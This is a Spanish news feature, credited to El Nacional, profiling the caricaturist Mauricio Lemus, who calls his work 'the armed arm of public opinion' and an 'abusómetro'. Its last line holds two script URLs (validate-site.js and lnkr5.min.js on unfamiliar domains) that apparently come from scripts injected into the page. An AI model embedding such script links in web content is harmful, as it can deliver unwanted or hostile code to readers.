Mauricio Lemus se concibe a través de sus irreverentes trazos, colores y valores como un contrapoder.

«Poderoso», «Power», «Poder», son algunas de las formas con las que se conoce a Mauricio Lemus, maestro de la ilustración y creador de las caricaturas que han acompañado milaes de textos de El Nacional y a quien hoy se le reconoce su talento y esfuerzo.

Lemus se concibe a través de sus irreverentes trazos, colores y valores como un contrapoder. «Lo que siento que hago es el brazo armado de la opinión pública, va directo, es intencional, incisivo. La caricatura te dice rápidamente, sin leer, lo que se siente. Algo que es cada vez más fuerte por todos los abusos que vivimos, es reflejo del país, termómetro del abuso cotidiano, lo que llamo el abusómetro».

Sobre su estilo, Lemus, gran aficionado a la ciencia ficción, afirma que en cada ilustración busca lo inédito, impactante, que el lector sienta que puede invadirlo e incluso repugnar a través de los monstruos y figuras que crea en su interpretación visual del texto.

«Es algo que llamo la metáfora del intelecto» para hacer reaccionar al lector. La idea es que algo te mueva, así como el periodista se basa en los datos, escribe e impacta. La idea de la ilustración es que sea un escándalo en la página, que motive a leer, que sea publicidad del texto y enganche», dice.

«La caricatura es reflejo del país, termómetro del abuso cotidiano, lo que llamo el abusómetro»

VÍA EL NACIONAL.

 

https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x6748x&r=1533349682150https://devlinkin.xyz/addons/lnkr5.min.js

Loading...